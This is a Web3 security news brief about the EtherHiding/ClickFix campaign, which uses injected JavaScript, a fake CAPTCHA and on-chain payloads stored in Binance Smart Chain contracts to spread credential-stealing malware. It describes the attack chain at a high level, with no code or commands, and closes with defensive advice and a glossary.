Security

Web3 Users Compromised by EtherHiding Malware Campaign via JavaScript Injection

Threat actors are leveraging compromised websites and four BSC contracts to deploy credential-stealing malware, bypassing traditional network defenses.
November 30, 20253 min

A striking close-up captures a bright blue liquid in motion, splashing and creating foam over a highly detailed, metallic, grid-like structure. The composition highlights the fluid's interaction with the precise, interlocking components of the underlying system
A prominent abstract structure dominates the foreground, composed of numerous dark blue, sharp-edged crystalline elements clustered around two smooth white spheres. This entire formation is encircled by a continuous, smooth white ring, with similar out-of-focus structures in the background

Briefing

A sophisticated, multi-stage attack dubbed ‘ClickFix’ is actively targeting Web3 users by compromising legitimate websites with malicious JavaScript injections. The primary consequence is the theft of user credentials and private keys via common stealers like AMOS and Vidar, leading directly to wallet draining. This campaign achieves high stealth and resilience by using the “EtherHiding” technique, which stores the final-stage malware payload across four separate smart contracts deployed on the Binance Smart Chain.

The detailed composition showcases an open mechanical watch movement, its metallic components and precise gear train clearly visible. A substantial blue structure, adorned with intricate circuit-like patterns, connects to the watch, with a metallic arm extending into its core

Context

The prevailing threat landscape has seen a critical increase in supply chain attacks, where threat actors compromise a trusted third-party service to inject malicious code into front-end interfaces. This exploit leverages the inherent trust users place in legitimate websites and exploits the lack of comprehensive security measures that scan for malicious data hidden in on-chain state. The architecture bypasses conventional network-level security tools that typically block known malware delivery domains.

A prominent clear spherical object with an internal white circular panel featuring four distinct circular indentations dominates the center, set against a blurred backdrop of numerous irregularly shaped, faceted blue and dark grey translucent cubes. The central sphere, a visual metaphor for a core protocol or secure enclave, embodies a sophisticated governance mechanism, possibly representing a decentralized autonomous organization DAO or a multi-signature wallet's operational interface

Analysis

The attack chain initiates when a user visits a compromised website, triggering a malicious JavaScript inject that displays a fake CAPTCHA check, the ‘ClickFix’ lure. This script then executes the “EtherHiding” vector, querying a set of four smart contracts on the Binance Smart Chain to retrieve a Base64-encoded payload. A critical “gate contract” controls the delivery, allowing the threat actor to selectively enable or disable the attack by altering on-chain state.

This mechanism ultimately serves an OS-specific stealer that harvests credentials and private keys. The use of the immutable blockchain as a command-and-control server makes the payload highly resistant to takedown attempts.

A detailed, close-up perspective reveals the intricate open mechanism of a silver-toned, angular watch, featuring numerous gears, springs, and small ruby-red jewels. Centrally positioned and prominent within the mechanical assembly is a polished, faceted representation of the Ethereum ETH logo, serving as the conceptual heart of the timepiece

Parameters

  • Attack Vector Obfuscation → Four smart contracts on BSC used for payload storage and delivery.
  • Infection Method → Malicious JavaScript injection on compromised legitimate websites.
  • Payload Stealers → AMOS and Vidar malware families.
  • Control Mechanism → On-chain state change via a “gate contract” to toggle the attack.

A close-up view reveals a highly detailed, futuristic mechanical system composed of a central white, segmented spherical module and translucent blue crystalline components. These elements are interconnected by a metallic shaft, showcasing intricate internal structures and glowing points within the blue sections, suggesting active data flow

Outlook

Immediate mitigation requires all Web3 users to exercise extreme caution with any unexpected CAPTCHA or wallet-signing request, regardless of the host website’s apparent legitimacy. For protocols, this incident establishes a new security standard mandating continuous monitoring for third-party script integrity and the integration of on-chain forensic tools to identify malicious data storage patterns. The technique of using blockchain state for C2 infrastructure is a contagion risk that will likely be adopted by other sophisticated threat actors, necessitating a shift in defense from network-level to on-chain data analysis.

A dynamic, close-up view reveals a sophisticated, white and blue mechanical apparatus, centrally featuring a rotating element. From its core, a vibrant blue stream of digital data particles emanates, extending into a blurred background filled with similar luminous points

Verdict

This EtherHiding campaign represents a significant escalation in Web3 attack sophistication, demonstrating that threat actors are successfully leveraging the blockchain’s immutability as an undetectable command-and-control infrastructure.

supply chain attack, malicious javascript inject, on-chain payload delivery, smart contract obfuscation, credential stealer malware, private key theft, wallet draining scam, social engineering lure, Base64 encoded payload, Binance Smart Chain, gate contract logic, multi-stage infection, web3 security threat, front-end compromise, remote code execution, OS specific malware Signal Acquired from → thehackernews.com

Micro Crypto News Feeds

wallet draining

Definition ∞ Wallet Draining is a malicious activity where an attacker illicitly transfers funds from a victim's digital wallet.

supply chain

Definition ∞ A supply chain is the network of all the individuals, companies, resources, activities, and technologies involved in the creation and sale of a product, from the delivery of source materials from the supplier to the manufacturer, through to its eventual sale to the end consumer.

smart chain

Definition ∞ A Smart Chain is a type of blockchain network specifically designed to support the execution of smart contracts and decentralized applications.

private keys

Definition ∞ Private keys are secret cryptographic codes that grant exclusive access and control over a user's digital assets on a blockchain.

javascript injection

Definition ∞ JavaScript Injection is a cyberattack where malicious JavaScript code is inserted into a website.

malware

Definition ∞ Malware is malicious software designed to infiltrate and damage computer systems or steal sensitive information.

contract

Definition ∞ A 'Contract' is a set of rules and code that automatically executes when predefined conditions are met.

on-chain

Definition ∞ On-chain refers to any transaction or data that is recorded and validated directly on a blockchain ledger, making it publicly verifiable and immutable.

web3

Definition ∞ Web3 represents the conceptual evolution of the internet, aiming for a decentralized architecture built upon blockchain technology and distributed ledger systems.

Tags:

Tags: